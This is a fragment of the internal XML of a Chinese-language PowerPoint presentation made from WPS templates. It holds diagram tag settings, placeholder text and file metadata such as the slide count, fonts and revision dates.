  <p:tag name="KSO_WM_UNIT_NOCLEAR" val="0"/>
  <p:tag name="KSO_WM_UNIT_TYPE" val="m_h_f"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1_3_1"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val="#wm#"/>
  <p:tag name="KSO_WM_UNIT_VALUE" val="28"/>
  <p:tag name="KSO_WM_DIAGRAM_COLOR_TRICK" val="1"/>
  <p:tag name="KSO_WM_DIAGRAM_MAX_ITEMCNT" val="4"/>
  <p:tag name="KSO_WM_DIAGRAM_VIRTUALLY_FRAME" val="{&quot;height&quot;:416.20001220703125,&quot;left&quot;:-0.375,&quot;top&quot;:61.92495452640569,&quot;width&quot;:960.75}"/>
  <p:tag name="KSO_WM_DIAGRAM_COLOR_MATCH_VALUE" val="{&quot;shape&quot;:{&quot;fill&quot;:{&quot;solid&quot;:{&quot;brightness&quot;:0.6000000238418579,&quot;colorType&quot;:1,&quot;foreColorIndex&quot;:13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"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_TYPE" val="1"/>
  <p:tag name="KSO_WM_UNIT_PRESET_TEXT" val="单击此处输入你的项正文，文字是您思想的提炼"/>
  <p:tag name="KSO_WM_DIAGRAM_USE_COLOR_VALUE" val="{&quot;color_scheme&quot;:1,&quot;color_type&quot;:1,&quot;theme_color_indexes&quot;:[5,6,5,6,5,6]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3*m_h_a*1_1_1"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="diagram"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20231493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1_1"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val="#wm#"/>
  <p:tag name="KSO_WM_UNIT_VALUE" val="9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0001220703125,&quot;left&quot;:-0.375,&quot;top&quot;:61.92495452640569,&quot;width&quot;:960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  <p:tag name="KSO_WM_DIAGRAM_USE_COLOR_VALUE" val="{&quot;color_scheme&quot;:1,&quot;color_type&quot;:1,&quot;theme_color_indexes&quot;:[5,6,5,6,5,6]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3*m_h_i*1_1_2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SUBTYPE" val="d"/>
  <p:tag name="KSO_WM_UNIT_TYPE" val="m_h_i"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1_1_2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0001220703125,&quot;left&quot;:-0.375,&quot;top&quot;:61.92495452640569,&quot;width&quot;:960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3*m_h_a*1_2_1"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="diagram"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20231493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2_1"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val="#wm#"/>
  <p:tag name="KSO_WM_UNIT_VALUE" val="4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0001220703125,&quot;left&quot;:-0.375,&quot;top&quot;:61.92495452640569,&quot;width&quot;:960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  <p:tag name="KSO_WM_DIAGRAM_USE_COLOR_VALUE" val="{&quot;color_scheme&quot;:1,&quot;color_type&quot;:1,&quot;theme_color_indexes&quot;:[5,6,5,6,5,6]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3*m_h_i*1_2_2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SUBTYPE" val="d"/>
  <p:tag name="KSO_WM_UNIT_TYPE" val="m_h_i"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1_2_2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0001220703125,&quot;left&quot;:-0.375,&quot;top&quot;:61.92495452640569,&quot;width&quot;:960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3*m_h_a*1_3_1"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="diagram"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20231493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m1-1"/>
  <p:tag name="KSO_WM_UNIT_TYPE" val="m_h_a"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1_3_1"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val="#wm#"/>
  <p:tag name="KSO_WM_UNIT_VALUE" val="4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0001220703125,&quot;left&quot;:-0.375,&quot;top&quot;:61.92495452640569,&quot;width&quot;:960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标题"/>
  <p:tag name="KSO_WM_DIAGRAM_USE_COLOR_VALUE" val="{&quot;color_scheme&quot;:1,&quot;color_type&quot;:1,&quot;theme_color_indexes&quot;:[5,6,5,6,5,6]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93_3*m_h_i*1_3_2"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="diagram"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20231493"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="3.0"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="m1-1"/>
  <p:tag name="KSO_WM_UNIT_SUBTYPE" val="d"/>
  <p:tag name="KSO_WM_UNIT_TYPE" val="m_h_i"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1_3_2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1"/>
  <p:tag name="KSO_WM_DIAGRAM_VIRTUALLY_FRAME" val="{&quot;height&quot;:416.20001220703125,&quot;left&quot;:-0.375,&quot;top&quot;:61.92495452640569,&quot;width&quot;:960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70&quot;:[3312658,3317763,3319356,3312170,3330845]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075,&quot;width&quot;:5595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999877929687,&quot;left&quot;:421.01381912832187,&quot;top&quot;:178.5956753948542,&quot;width&quot;:510.4475585937504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6960_2*l_h_i*1_1_1"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="diagram"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20236960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999877929687,&quot;left&quot;:421.01381912832187,&quot;top&quot;:178.5956753948542,&quot;width&quot;:510.4475585937504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6960_2*l_h_i*1_2_1"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="diagram"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20236960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999877929687,&quot;left&quot;:421.01381912832187,&quot;top&quot;:178.5956753948542,&quot;width&quot;:510.4475585937504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diagram20236960_2*l_h_i*1_1_2"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="diagram"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20236960"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="3.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val="#wm#"/>
  <p:tag name="KSO_WM_UNIT_PRESET_TEXT" val="01"/>
  <p:tag name="KSO_WM_UNIT_FILL_TYPE" val="3"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_FORE_SCHEMECOLOR_INDEX" val="1"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_TYPE" val="1"/>
  <p:tag name="KSO_WM_DIAGRAM_MAX_ITEMCNT" val="6"/>
  <p:tag name="KSO_WM_DIAGRAM_MIN_ITEMCNT" val="2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800000011920929,&quot;colorType&quot;:1,&quot;foreColorIndex&quot;:5,&quot;pos&quot;:1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999877929687,&quot;left&quot;:421.01381912832187,&quot;top&quot;:178.5956753948542,&quot;width&quot;:510.4475585937504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6960_2*l_h_f*1_1_1"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="diagram"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20236960"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="3.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val="#wm#"/>
  <p:tag name="KSO_WM_UNIT_PRESET_TEXT" val="单击添加&#10;目录项标题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999877929687,&quot;left&quot;:421.01381912832187,&quot;top&quot;:178.5956753948542,&quot;width&quot;:510.4475585937504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ID" val="diagram20236960_2*l_h_i*1_2_2"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="diagram"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20236960"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="3.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val="#wm#"/>
  <p:tag name="KSO_WM_UNIT_PRESET_TEXT" val="02"/>
  <p:tag name="KSO_WM_UNIT_FILL_TYPE" val="3"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_FORE_SCHEMECOLOR_INDEX" val="1"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_TYPE" val="1"/>
  <p:tag name="KSO_WM_DIAGRAM_MAX_ITEMCNT" val="6"/>
  <p:tag name="KSO_WM_DIAGRAM_MIN_ITEMCNT" val="2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800000011920929,&quot;colorType&quot;:1,&quot;foreColorIndex&quot;:5,&quot;pos&quot;:1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999877929687,&quot;left&quot;:421.01381912832187,&quot;top&quot;:178.5956753948542,&quot;width&quot;:510.4475585937504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6960_2*l_h_f*1_2_1"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="diagram"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20236960"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="3.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val="#wm#"/>
  <p:tag name="KSO_WM_UNIT_PRESET_TEXT" val="单击添加&#10;目录项标题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999877929687,&quot;left&quot;:421.01381912832187,&quot;top&quot;:178.5956753948542,&quot;width&quot;:510.4475585937504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6960_2*l_h_i*1_3_1"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="diagram"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20236960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999877929687,&quot;left&quot;:421.01381912832187,&quot;top&quot;:178.5956753948542,&quot;width&quot;:510.4475585937504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diagram20236960_2*l_h_i*1_3_2"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="diagram"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20236960"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="3.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val="#wm#"/>
  <p:tag name="KSO_WM_UNIT_PRESET_TEXT" val="03"/>
  <p:tag name="KSO_WM_UNIT_FILL_TYPE" val="3"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_FORE_SCHEMECOLOR_INDEX" val="1"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_TYPE" val="1"/>
  <p:tag name="KSO_WM_DIAGRAM_MAX_ITEMCNT" val="6"/>
  <p:tag name="KSO_WM_DIAGRAM_MIN_ITEMCNT" val="2"/>
  <p:tag name="KSO_WM_DIAGRAM_COLOR_MATCH_VALUE" val="{&quot;shape&quot;:{&quot;fill&quot;:{&quot;gradient&quot;:[{&quot;brightness&quot;:0.800000011920929,&quot;colorType&quot;:1,&quot;foreColorIndex&quot;:5,&quot;pos&quot;:0,&quot;transparency&quot;:0},{&quot;brightness&quot;:0.800000011920929,&quot;colorType&quot;:1,&quot;foreColorIndex&quot;:5,&quot;pos&quot;:1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65.6999877929687,&quot;left&quot;:421.01381912832187,&quot;top&quot;:178.5956753948542,&quot;width&quot;:510.4475585937504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6960_2*l_h_f*1_3_1"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="diagram"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20236960"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="3.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val="#wm#"/>
  <p:tag name="KSO_WM_UNIT_PRESET_TEXT" val="单击添加&#10;目录项标题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61,&quot;width&quot;:15292}"/>
</p:tagLst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3316</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>225</Paragraphs>
  <Slides>36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黑体</vt:lpstr>
      <vt:lpstr>华文楷体</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Times New Roman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皓喆 陆</cp:lastModifiedBy>
  <cp:revision>155</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-07-16T14:02:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-07-25T10:35:12Z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DD3DD651B791427DA4D17532459FB737</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>2052-12.1.0.16120</vt:lpwstr>
  </property>
</Properties>
</file>